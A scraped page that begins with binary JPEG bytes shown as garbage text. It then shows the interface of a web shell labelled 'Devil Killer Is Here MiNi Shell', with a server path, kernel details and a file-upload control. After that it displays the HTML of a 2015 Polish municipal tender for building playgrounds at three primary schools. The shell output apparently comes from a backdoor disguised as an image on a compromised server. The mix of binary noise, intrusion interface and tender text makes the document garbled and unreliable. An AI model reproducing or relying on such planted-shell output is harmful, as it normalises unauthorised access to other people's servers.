JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150529/129312-N-2015.html

<p class="kh_header"><b>Wola Krzysztoporska: Budowa placów zabaw przy szkołach podstawowych w Krzyżanowie, Bogdanowie i Gomulinie</b><br>
<b>Numer ogłoszenia: 129312 - 2015; data zamieszczenia: 29.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wola Krzysztoporska , ul. Kościuszki 5/11, 97-371 Wola Krzysztoporska, woj. łódzkie, tel. (044) 61-63-961, faks (044) 61-63-960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola-krzysztoporska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw przy szkołach podstawowych w Krzyżanowie, Bogdanowie i Gomulinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest budowa placów zabaw przy szkołach podstawowych w Krzyżanowie, Bogdanowie i Gomulinie obejmująca m.in. wykonanie sztucznej nawierzchni i montaż urządzeń zabawowych.

Zamówienie realizowane jest w ramach projektu pn. Modernizacja oddziałów przedszkolnych przy szkołach podstawowych w Gminie Wola Krzysztoporska współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Podziałania 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.

Zamówienie składa się z  następujących części:

CZĘŚĆ I: Budowa placu zabaw przy Szkole Podstawowej w Krzyżanowie.
Przedmiotem zamówienia jest budowa placu zabaw przy Szkole Podstawowej w Krzyżanowie działka nr ewid. 128, obręb Krzyżanów, gm. Wola Krzysztoporska, obejmująca m.in. wykonanie sztucznej nawierzchni i  montaż urządzeń zabawowych.


CZĘŚĆ II: Budowa placu zabaw przy Szkole Podstawowej w Bogdanowie.
Przedmiotem zamówienia jest budowa placu zabaw przy Szkole Podstawowej w Bogdanowie działka nr ewid. 271, obręb Bogdanów, gm. Wola Krzysztoporska, obejmująca m.in  wykonanie sztucznej nawierzchni i  montaż urządzeń zabawowych.


CZĘŚĆ III: Budowa placu zabaw przy Szkole Podstawowej w Gomulinie.
Przedmiotem zamówienia jest budowa placu zabaw wraz z wyposażeniem w urządzenia zabawowe przy Szkole Podstawowej w Gomulinie działka nr ewid. 346/8, obręb Gomulin, gm. Wola Krzysztoporska, obejmująca wykonanie m.in sztucznej nawierzchni i  montaż urządzeń zabawowych.


Roboty w ramach poszczególnych części zamówienia należy wykonać zgodnie z załączoną dokumentacją projektową oraz w oparciu o specyfikacje techniczne wykonania i odbioru robót budowlanych.


1.2. Uszczegółowienie opisu przedmiotu zamówienia zawierają:

Załącznik nr 7a do SIWZ - Projekt budowlano-wykonawczy dla cz.I zamówienia

Załącznik nr 7b do SIWZ - Projekt budowlano-wykonawczy dla cz.II zamówienia

Załącznik nr 7c do SIWZ - Projekt budowlano-wykonawczy dla cz.III zamówienia


Załącznik nr 8a do SIWZ - Specyfikacja techniczna wykonania i odbioru robót dla cz.I zamówienia

Załącznik nr 8b do SIWZ - Specyfikacja techniczna wykonania i odbioru robót dla cz.II zamówienia

Załącznik nr 8c do SIWZ - Specyfikacja techniczna wykonania i odbioru robót dla cz.III zamówienia


Załącznik nr 9a do SIWZ - Przedmiary dla cz.I zamówienia

Załącznik nr 9b do SIWZ - Przedmiary dla cz.II zamówienia

Załącznik nr 9c do SIWZ - Przedmiary dla cz.III zamówienia

Specyfikacja Istotnych Warunków Zamówienia, składa się nie tylko z zasadniczej części opisowej, ale także ze wszystkich tworzących ją załączników, łącznie z projektem umowy dotyczącym realizacji zamówienia objętego przedmiotem niniejszego postępowania przetargowego.

Przedmiary robót załączone są pomocniczo, stanowić mogą jedynie bazę do dalszych wyliczeń Wykonawcy przy kalkulacji ceny ofertowej, natomiast  wykonawca szacuje cenę ofertową na podstawie własnej kalkulacji obmiarowej.

Wykonawca zobowiązany jest do  dokonania wyceny na podstawie wiedzy technicznej, dokumentacji projektowej, własnej oceny z uwzględnieniem wszystkich niezbędnych prac budowlanych do wykonania przedmiotowej inwestycji.

1.3. Wynagrodzenie ma charakter ryczałtowy a jego zakres obejmuje również elementy nie ujęte niniejszej SIWZ z załącznikami, ale konieczne do prawidłowego wykonania robót budowlanych.

1.4. W ramach ceny ryczałtowej Wykonawca zobowiązany jest wykonać niezbędne czynności pomocnicze, w tym:
a)zapewnienie pełnej obsługi geodezyjnej inwestycji wraz ze sporządzeniem inwentaryzacji geodezyjnej wykonanych robót,
b)uzyskanie w imieniu zamawiającego wszelkich niezbędnych pozwoleń, uzgodnień, dokumentów itp., których obowiązek posiadania wynika z przepisów prawa oraz które są niezbędne do realizacji zamówienia,
c)oznakowanie robót,
d)składowanie i wywóz odpadów powstających w trakcie realizacji robót.

1.5. Zaleca się by Wykonawca przed złożeniem oferty zapoznał się z warunkami lokalizacyjno-terenowymi inwestycji i uwzględnił je  w wynagrodzeniu.

1.6. Roboty powinny być wykonane zgodnie z SIWZ oraz zaleceniami Zamawiającego, inspektora nadzoru inwestorskiego i autorskiego.

2. Wykonawca udzieli Zamawiającemu:
- gwarancji jakości na cały przedmiot zamówienia na okres minimum 36 miesięcy, liczony od dnia odbioru końcowego, maksymalny oczekiwany przez Zamawiającego okres gwarancji wynosi 72 miesiące,
- rękojmi za wady na okres równy zaoferowanemu okresowi gwarancji, liczony od dnia odbioru końcowego.

3. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.

4. Zamawiający dopuszcza możliwość składania ofert częściowych - na jedną lub więcej części zamówienia.

5. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.  

6. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 

7. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia podstawowego.

8. Zamawiający nie przewiduje przy wyborze oferty zastosowania aukcji elektronicznej.

9. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim wypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.

10. Wymagania stawiane Wykonawcy:
10.1. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi  i jakościowymi opisanymi dla przedmiotu zamówienia.  
10.2.   Wymagana jest należyta staranność przy realizacji zobowiązań umowy.  
10.3. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.  
10.4. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
10.5. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  

11. Możliwość stosowania materiałów i urządzeń równoważnych.
11.1. Wskazane w ogłoszeniu o zamówieniu, SIWZ z załącznikami, w szczególności  w dokumentacji projektowej, znaki towarowe, patenty lub pochodzenie urządzeń i materiałów należy  traktować jedynie jako propozycje Zamawiającego.
11.2. Zamawiający dopuszcza możliwość złożenia ofert równoważnych w zakresie zaproponowanych materiałów i urządzeń wskazanych w ogłoszeniu o zamówieniu oraz SIWZ  z załącznikami. 
11.3. Zamawiający dopuszcza zastosowanie innych materiałów i urządzeń niż podane  w  ogłoszeniu o zamówieniu oraz SIWZ z załącznikami pod warunkiem zapewnienia parametrów równoważnych do opisanych w dokumentacji.

12. Zgodnie z art. 30 ust. 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający informuje, że w każdym przypadku, kiedy opisuje przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów doniesienia, o których mowa w art. 30 ust. 1-3 ww. ustawy, dopuszcza rozwiązania równoważne opisanym.

13. Zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 
50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.32.00-1, 45.23.63.10-5, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że w okresie ostatnich pięciu lat przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
- 1 robotę o wartości min. 80.000,00 zł brutto, polegającą na budowie placu zabaw dla dzieci, która obejmowała wykonanie sztucznej nawierzchni i  montaż urządzeń zabawowych.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na potwierdzenie spełniania warunku w zakresie wiedzy i doświadczenia Wykonawca przedstawi w wykazie robót budowlanych, iż wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
- 1 robotę o wartości min. 80.000,00 zł brutto polegającą na budowie placu zabaw dla dzieci, która obejmuje m.in. wykonanie sztucznej nawierzchni i  montaż urządzeń zabawowych.
Dowodami, dotyczącymi robót budowlanych są poświadczenie lub inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
Wzór wykazu zawiera załącznik nr 5 do SIWZ.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>C. Do oferty należy także załączyć następujące dokumenty:
C.1)  Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1  do SIWZ.
C.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z  art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2 do SIWZ.
C.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 Prawa zamówień publicznych - załącznik nr 3 do SIWZ.
C.4) Oświadczenie dotyczące grupy kapitałowej zgodnie z art. 26 ust. 2d Prawa zamówień publicznych - załącznik nr 4 do SIWZ.
C.5) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
Pełnomocnictwo składane jest w oryginale lub kopii potwierdzonej notarialnie za zgodność z oryginałem.
C.6) W przypadku zastrzeżenia informacji wchodzących w skład oferty jako stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, wykonawca zobowiązany jest dołączyć do oferty szczegółowe uzasadnienie dokonanego zastrzeżenia.
D. Postanowienia dotyczące składania dokumentów przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej
D.1) Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. B.1), B.2), B.3)   składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
D.2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, wskazanych w pkt D.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionych nie wcześniej niż w terminach określonych w pkt D.1).
D.3) W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
E. Dokumenty wymagane w przypadku składania oferty wspólnej (konsorcja/spółki cywile): 

E.1) Oferta winna zawierać oświadczenia i dokumenty opisane w SIWZ:
 - punkty C.3), C.4),
 - punkty B.1), B.2), B.3),
dla każdego wykonawcy z osobna tj. złożone przez każdego z członków podmiotu  występującego wspólnie w imieniu własnym (w przypadku spółki cywilnej każdy wspólnik składa osobne oświadczenie we własnym imieniu).
Pozostałe dokumenty składane są wspólnie.
E.2) Wykonawcy wspólnie ubiegający się o zamówienie:
1. Zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.
2. Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną. Fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów. Wszelka korespondencja prowadzona będzie z Pełnomocnikiem.

F. Postanowienia dotyczące składanych dokumentów

F.1) Oferta, wszystkie wymagane załączniki, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego. Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii.
F.2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
F.3) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
F.4) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz  w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez te podmioty.
F.5) Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. A polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów wymienionych w punkcie C.3) oraz punktach od B.1) do B.3) dotyczących każdego z tych podmiotów.
F.6) Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt A polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów do oferty należy dołączyć dokumenty dotyczące:
-   zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
 -   charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
 -   zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
